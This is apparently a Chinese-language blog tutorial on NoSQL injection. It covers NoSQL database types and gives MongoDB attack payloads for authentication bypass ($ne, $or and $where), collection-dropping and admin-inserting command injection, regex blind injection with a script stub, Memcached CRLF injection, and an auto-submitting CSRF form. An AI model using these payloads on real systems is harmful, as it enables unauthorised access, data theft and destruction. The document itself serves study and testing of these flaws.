无题
前置知识
NoSQL 数据库(意即”Not Only SQL,不仅仅是SQL”)并非表格格式,其存储数据的方式与关系表不同。NoSQL 数据库的类型因数据模型而异。主要类型包括文档、键值、宽列和图形。它们提供了灵活的模式,可以随大量数据和高用户负载而轻松扩展。NoSQL 数据库是以关系表以外的格式存储数据的数据库,是一种非关系型数据库。
随着存储成本迅速降低,存储和查询所需的数据应用程序数量也增加了。这些数据具有各种形状和大小(结构化、半结构化和多态性),因此预先定义架构几乎变得不可能。于是在二十世纪晚期出现了 NoSQL 数据库,NoSQL 数据库允许开发者存储大量非结构化数据,从而为他们提供了很高的灵活性。
另外云计算也越来越流行,开发者开始使用公有云来托管其应用程序和数据。他们希望能够在多个服务器和区域之间分布数据,以使其应用程序具有弹性,可以横向扩展而不是纵向扩展以及对数据进行智能地理定位。一些 NoSQL 数据库(如 MongoDB)提供了这些功能。
类型
NOSQL主要有四种数据类型,分别是文档数据库,键值数据库,宽列存储数据库和图形数据库。
- 文档数据库将数据存储在类似于 JSON(JavaScript 对象表示法)对象的文档中。每个文档包含成对的字段和值。这些值通常可以是各种类型,包括字符串、数字、布尔值、数组或对象等,并且它们的结构通常与开发者在代码中使用的对象保持一致。由于字段值类型和强大的查询语言的多样性,因此文档数据库非常适合各种各样的使用案例,并且可以用作通用数据库。它们可以横向扩展以适应大量数据。
- 键值数据库是一种较简单的数据库,其中每个项目都包含键和值。通常只能通过引用键来检索值,因此学习如何查询特定键值对通常很简单。键值数据库非常适合需要存储大量数据但无需执行复杂查询来检索数据的使用案例。常见的使用案例包括存储用户首选项或缓存。Redis 和 DynanoDB 是流行的键值数据库。
- 宽列存储将数据存储在表、行和动态列中。宽列存储提供了比关系型数据库更大的灵活性,因为不需要每一行都具有相同的列。许多人认为宽列存储是二维键值数据库。宽列存储非常适合需要存储大量数据并且可以预测查询模式的情况。宽列存储通常用于存储物联网数据和用户配置文件数据。Cassandra 和 HBase 是较受欢迎的两种宽列存储。
- 图形数据库将数据存储在节点和边中。节点通常存储有关人物、地点和事物的信息,而边缘则存储有关节点之间的关系的信息。在需要遍历关系以查找模式(例如社交网络,欺诈检测和推荐引擎)的使用案例中,图形数据库非常出色。Neo4j 和 JanusGraph 是图形数据库的示例。
优点
- 快速读写
- 主要例子有Redis,由于其逻辑简单,而且纯内存操作,使得其性能非常出色,单节点每秒可以处理超过10万次读写操作
- 方便扩展
- NoSQL去掉关系数据库的关系型特性,很容易横向扩展,摆脱了以往老是纵向扩展的诟病。
- 低廉成本
- 相较于关系型数据库来说,企业级授权费用降低很多。
- 灵活的数据类型
- NoSQL无需事先为要存储的数据建立字段,随时可以存储自定义的数据格式。
攻击种类
第一种是按照语言的分类,可以分为:PHP 数组注入,JavaScript 注入和 Mongo Shell 拼接注入等等。
第二种是按照攻击机制分类,可以分为:重言式注入,联合查询注入,JavaScript 注入、盲注等,这种分类方式很像传统 SQL 注入的分类方式。
还有背负式查询 、跨域违规等
- 重言式注入又称为永真式,此类攻击是在条件语句中注入代码,使生成的表达式判定结果永远为真,从而绕过认证或访问机制。
- 联合查询注入联合查询是一种众所周知的 SQL 注入技术,攻击者利用一个脆弱的参数去改变给定查询返回的数据集。联合查询最常用的用法是绕过认证页面获取数据。
- JavaScript 注入MongoDB Server 支持 JavaScript,这使得在数据引擎进行复杂事务和查询成为可能,但是传递不干净的用户输入到这些查询中可以注入任意的 JavaScript 代码,导致非法的数据获取或篡改。
- 盲注当页面没有回显时,那么我们可以通过 $regex 正则表达式来达到和传统 SQL 注入中 substr() 函数相同的功能,而且 NoSQL 用到的基本上都是布尔盲注。
- 背负式查询
- 在背负式查询中,攻击者通过利用转义特定字符(比如像回车和换行之类的结束符)插入由数据库额外执行的查询,这样就可以执行任意代码了。
- 跨域违规
- HTTP REST APIs是NoSQL数据库中的一个流行模块,然而,它们引入了一类新的漏洞,它甚至能让攻击者从其他域攻击数据库。在跨域攻击中,攻击者利用合法用户和他们的网页浏览器执行有害的操作。在本文中,我们将展示此类跨站请求伪造(CSRF)攻击形式的违规行为,在此网站信任的用户浏览器将被利用在NoSQL数据库上执行非法操作。通过把HTML格式的代码注入到有漏洞的网站或者欺骗用户进入到攻击者自己的网站上,攻击者可以在目标数据库上执行post动作,从而破坏数据库。
mongodb数据库注入
重言式注入
又称永真式 ,既在条件语句中注入代码使其表达式判定结果永远为真,从而绕过认证或访问机制。首先我们需要了解下部分mongodb的操作符。
| 方法名 | 描述 |
|---|---|
| $gt | 大于 |
| $lte | 小于等于 |
| $in | 包含 |
| $nin | 不包含 |
| $lt | 小于 |
| $gte | 大于等于 |
| $ne | 不等于 |
| $eq | 等于 |
| $and | 与 |
|---|---|
| $nor | $nor在NOR一个或多个查询表达式的数组上执行逻辑运算,并选择 对该数组中所有查询表达式都失败的文档 |
| $not | 反匹配(1.3.3及以上版本),字段值不匹配表达式或者字段值不存在 |
| $or | 或 |
模糊查询用正则式:db.customer.find({‘name’: {‘$regex’:’.s.’} })
在这些操作符中,$ne就是我们在重言式注入中需要利用到的那个。它的作用是将不等于指定值的数据都查询出来。比如$ne=1时就是将所有不等于1的数据都查询出来。
通过构造好的查询语句我们可以查到一组账户和密码
username=admin&password=123456
我们提供的用户名和密码传入后端后会被处理成
1 | array( |
进入 MongoDB 后执行的查询命令为
db.users.find({'username':'admin', 'password':'123456'})
这时因为没有任何过滤,所以如果我们构造POC为,就能将数据库中所有的账户密码都查询出来
username[$ne]=1&password[$ne]=1
同样,进入后端的参数会变成
1 | array( |
查询命令也会变成
db.users.find({'username':{$ne:1}, 'password':{$ne:1}})
对于 PHP 本身的特性而言,由于其松散的数组特性,导致如果我们发送 value=1 那么,也就是发送了一个 value 的值为 1 的数据。如果发送 value[$ne]=1 则 PHP 会将其转换为数组 value=array($ne=>1),当数据到了进入 MongoDB 后,原来一个单一的 {"value":1} 查询就变成了一个 {"value":{$ne:1} 条件查询。同样的,我们也可以使用下面这些作为 payload 进行攻击:
1 | username[$ne]=&password[$ne]= |
联合查询注入
我们知道,在SQL注入中,有时候我们可以通过拼接字符串的方式绕过一些过滤,比如select+name,password+from+user。或者是常见的万能密码利用方法,比如 admin’ or 1=1#这样闭合前面的引号利用or使逻辑判断永远为真,从而达到绕过登录验证的目的进入后台等。虽然mongodb的查询语句是json格式的,但我们同样可以使用字符串拼接的方式来使它逻辑判断永远为真。
我们假如后端某处的登录代码是这样的
1 | string query ="{ username: '" + $username + "', password: '" + $password + "' }" |
当输入账号密码后,正常的查询语句是这样的
{'username':'admin', 'password':'123456'}
由于这里没做任何过滤,所以我们可以构造恶意的payload来绕过登录
username=admin', $or: [ {}, {'a': 'a&password=' }]
这样拼接payload后的查询语句就变成了
{ username: 'admin', $or: [ {}, {'a':'a', password: '' }]}
我们可以用mongodb看看效果
db.users.find({ username: 'admin', $or: [ {}, {'a':'a', password: '' }]})
这样我们就不需要密码也能登录了,但是现在无论是 PHP 的 MongoDB Driver 还是 Nodejs 的 Mongoose 都必须要求查询条件必须是一个数组或者 Query 对象了,因此这种注入方法简单了解一下就好了。
JavaScrip注入
MongoDB Server 是支持 JavaScript 的,可以使用 JavaScript 进行一些复杂事务和查询,也允许在查询的时候执行 JavaScript 代码。但是如果传递不干净的用户输入到这些查询中,则可能会注入任意的 JavaScript 代码,导致非法的数据获取或篡改。而Mongodb中的$where操作符就可以用来执行Javascript语句。
首先我们需要了解一下 $where 操作符,$where操作符可以在MongoDB查询语句中使用,允许你通过JavaScript表达式执行高级查询。 $where操作符的值应该是一个JavaScript函数或字符串。函数或字符串中的JavaScript代码将在查询期间执行,并返回true或false,以确定文档是否匹配查询条件。
在 MongoDB 中,$where 操作符可以用来执行 JavaScript 代码,将 JavaScript 表达式的字符串或 JavaScript 函数作为查询语句的一部分。在 MongoDB 2.4 之前,通过$where 操作符使用 map-reduce、group 命令甚至可以访问到 Mongo Shell 中的全局函数和属性,如 db,也就是说可以在自定义的函数里获取数据库的所有信息。并且因为该操作符允许通过JavaScript表达式执行高级查询。如果攻击者能够注入恶意JavaScript代码,则可以利用此漏洞执行任意查询,甚至删除或修改文档。
举个例子
db.users.find( { $where: function() { return this.username == ‘admin’; } } )
该查询返回在users集合中username等于admin的所有文档。
下面我们先准备个用于测试的php文件
1 | <?php |
MongoDB 2.4 之前 在 MongoDB 2.4 之前,通过 $where 操作符使用 map-reduce、group 命令可以访问到 Mongo Shell 中的全局函数和属性,如 db,也就是说可以通过自定义 JavaScript 函数来获取数据库的所有信息。
如下所示,发送以下数据后,如果有回显的话将获取当前数据库下所有的集合名:
username=1&password=1';(function(){return(tojson(db.getCollectionNames()))})();var a='1MongoDB 2.4 之后 MongoDB 2.4 之后 db 属性访问不到了,但我们应然可以构造万能密码。如果此时我们发送以下这几种数据就可以查出所有用户
username=1&password=1';return true//
或
username=1&password=1';return true;var a='1
这是因为发送 payload 进入 PHP 后的数据如下:
1 | array( |
进入 MongoDB 后执行的查询命令为:
db.users.find({$where: "function() { var username = '1';var password = '1';return true;var a='1';if(username == 'admin' && password == '123456'){ return true; }else{ return false; }}"})
我们从代码中可以看出,password 中的 return true 使得整个 JavaScript 代码提前结束并返回了 true,这样就构造出了一个永真的条件并完成了 NoSQL 注入。
但是,这里的payload的构造主要取决于后端的php代码是怎么写的,假如后端的php代码如下图所示
1 | <?php |
这时候我们需要构造的payload就变成了
username=1&password=1;return ture;
后端处理数据时就会变成
1 | var username = '" . $_REQUEST["username"] . "'; |
使用 Command 方法造成的注入
MongoDB Driver 一般都提供直接执行 Shell 命令的方法,这些方式一般是不推荐使用的,但难免有人为了实现一些复杂的查询去使用。在 MongoDB 的服务器端可以通过 db.eval 方法来执行 JavaScript 脚本,如我们可以定义一个 JavaScript 函数,然后通过 db.eval 在服务器端来运行。
但是在 PHP 官网中就已经友情提醒了不要这样使用:
1 | <?php |
还有人喜欢用 Command 去实现 MongoDB 的 distinct方法,如下:
1 | <?php |
这样都是很危险的,因为这个就相当于把 Mongo Shell 开放给了用户,如果此时构造下列 payload:
username=1'});db.users.drop();db.user.find({'username':'1username=1'});db.users.insert({"username":"admin","password":123456"});db.users.find({'username':'1
则将改变原本的查询语句造成注入。如果当前应用连接数据库的权限恰好很高,我们能干的事情就更多了
盲注
NoSQL的盲注和SQL注入盲注类似,都是不返回数据 ,只是根据错误页面的返回来判断是否存在注入。 此处我们需要用到的MongoDB的 操作符来进行盲注$eq(等于)和$regex(正则匹配)。
$regex为查询中的模式匹配字符串提供正则表达式功能 。MongoDB使用具有UTF-8支持的Perl兼容正则表达式(即“ PCRE”)版本8.42。
要使用$regex,请使用以下语法之一:
{ <field>: { $regex: /pattern/, $options: '<options>' } }{ <field>: { $regex: 'pattern', $options: '<options>' } }{ <field>: { $regex: /pattern/<options> } }
在MongoDB中,您还可以使用正则表达式对象(即/pattern/)来指定正则表达式:
{ <field>: /pattern/<options> }
更详细的用法可以去官方文档了解
我们先修改下index.php来做测试,因为既然是盲注,就不会像之前一样把账户密码都报出来。
1 | <?php |
在已知用户名的情况下,我们通过正则匹配来获取密码
//判断密码长度http://127.0.0.1/index.php?username[$eq]=time&password[$regex]=.{5}
.{5} 表示匹配任意 5 个字符,这个正则表达式可以匹配长度为 5 的任意字符串,也就是说,密码必须是 5 个字符长的任意组合。
(. 是一个元字符,表示匹配任意单个字符(除了换行符)。在这个正则表达式中,.{5} 表示匹配任意5个字符,因为 . 匹配任意单个字符,而 {5} 表示重复5次)
逐渐增大数字,当数字为7时显示登录失败,而数字为6时登录成功(对应的就是有回显和无回显的情况),就说明密码长度为6
提交的数据进入 PHP 后的数据如下:1
2
3
4array(
'username' => 'admin',
'password' => array('$regex' => '.{6}')
)
进入 MongoDB 后执行的查询命令为:
db.users.find({‘username’:’admin’, ‘password’:{$regex:’.{6}’}})
不过对于盲注来说还是用脚本跑为宜,不然就比较费时费力,脚本比较简略,感兴趣的大佬可以自己改改
1 | import requests |
背负式查询
背负式查询”(Burdened Query)是指一种查询模式,其中数据库服务器(如MongoDB)会从单个查询请求中执行大量工作,而不是将负载分散到多个查询请求中。通常,数据库服务器在执行查询时会对负载进行平衡,以确保它们不会过度集中在任何一个查询请求上。但是,在背负式查询中,服务器需要处理大量的计算、内存和磁盘资源,以便在单个查询请求中处理大量数据。
在php5.5的时候该漏洞被修复,由于网上资料较少,所以此处在网上摘抄了一部分作为了解。
语法:set<KEY><FLAG><EXPIRE_TIME><LENGTH>,
当PHP配置的函数被调用时,接收参数如下:
$memcached->set('key', 'value');该驱动程序未能针对带有回车\r(0x0D)和换行的\n(0x0A)的ASCII码采取措施,导致攻击者有机会注入包含有键参数的新命令行和其 他非计划内的命令到缓存中8。如下代码,其中的$param是用户输入并作为键来作用:
$memcached=new Memcached(); $memcached ->addServer('localhost',11211); $memcached->set($param, "some value");
攻击者可以提供以下输入进行注入攻击: “key1 0 3600 4\r\nabcd\r\nset key2 0 3600 4\r\ninject\r\n“ 增加到数据库中的第一个键是具有”some value”值的key1。攻击者可以增加其他的、非计划内的键到数据库中,即带有”inject”值的key2。这种注入也可以发生在get命令上。看一下Memcached主页上的示例,它以这三行开头: Function get_foo(foo_id) foo = memcached_get("foo: ".foo_id) return foo if defined foo 这个示例展示了Memcached的典型用法,在处理输入之前首先检查在数据库中是不是已经存在了。假设用类似代码检查从用户那里接收的认证令牌,验证他们是不是登录过了,那么就可以通过传递以下作为令牌的字符串来利用它: "random_token\r\nsetmy_crafted_token036004\r\nroot\r\n"
当这个字符串作为令牌传递时,数据库将检查这个”random_token”是否存在,然后将添加一个具有”root”值的”my_crafted_token”。之后,攻击者就可以发送具有root身份的my_crafted_token令牌了。可以被这项技术攻击的其他指令还有:incr <Key><Amount>decr <Key><Amount>delete <Key>在此,incr用于增加一个键的值,decr用于缩减一个键的值,以及delete用于删除一个键。攻击者也可以用像set和get函数一样的手段来使用带来自己键参数的这三个函数。攻击者可以使用多条目函数进行同样的注入:deleteMulti、getMulti和setMulti,其中每一个键字段都可以被注入。回车换行注入可以被用于连接多个get请求。在一项我们进行的测试中,包括原始get在内最多可以连接17条。这样注入返回的结果是第一个键及其相应的值。
跨域违规
NoSQL数据库的另一个常见特点是,他们能够常常暴露能够从客户端应用进行数据库查询的HTTP REST API。暴露REST API 的数据库包括MongoDB、CouchDB和HBase。暴露REST API就直接把数据库暴露给应用了,甚至是仅基于HTML5的应用,因为它不再需要间接的驱动程序了,让任何编程语言都可以在数据库上执行HTTP查询。这么做的优势非常明显,但这一特点是否伴随着安全风险?我们的回答是肯定的:这种RESTAPI给跨站点请求伪造(CSRF)暴露了数据库,让攻击者绕过了防火墙和其他外围防御。HTTP REST APIs是NoSQL数据库中的一个流行模块,然而,它们引入了一类新的漏洞,它甚至能让攻击者从其他域攻击数据库。在跨域攻击中,攻击者利用合法用户和他们的网页浏览器执行有害的操作。是一种跨站请求伪造(CSRF)攻击形式的违规行为,在此网站信任的用户浏览器将被利用在NoSQL数据库上执行非法操作。通过把HTML格式的代码注入到有漏洞的网站或者欺骗用户进入到攻击者自己的网站上,攻击者可以在目标数据库上执行post动作,从而破坏数据库。现在让我们看看CSRF攻击是如何使用这个函数增加新文件到管理员集合中的,从而在hr数据库(它被认为处于安全的内部网络中)中增加了一个新的管理员用户,如下图所示。若想攻击成功,必须要满足几个条件。首先,攻击者必须能操作一个网站,要么是他们自己的网站,要么是利用不安全的网站。攻击在该网站放置一个HTML表单以及一段将自动提交该表单的脚本,比如:1
2
3
4
5
6<form action=" http://safe.internal. db/hr/admins/_insert"
method="POST" name="csrf">
<input type="text" name="docs" value=" [{"username":attacker}]"
/>
</form>
<script> document.forms[0].submit(); </script>
藏在防火墙后的内部网络内的用户被欺骗访问一个恶意外部网页,这将导致在内部网络的NoSQL数据库的REST API上执行非预期的查询。第二,攻击者必须通过网络诱骗或感染用户经常访问的网站欺骗用户进入被感染的网站。最后,用户必须许可访问Mongoose HTTP接口。用这种方式,攻击者不必进入内部网络即可执行操作,在本例中,是插入新数据到位于内部网络中的数据库中。这种攻击执行很简单,但要求攻击者要提前侦察去识别主机、数据库名称,等等。



















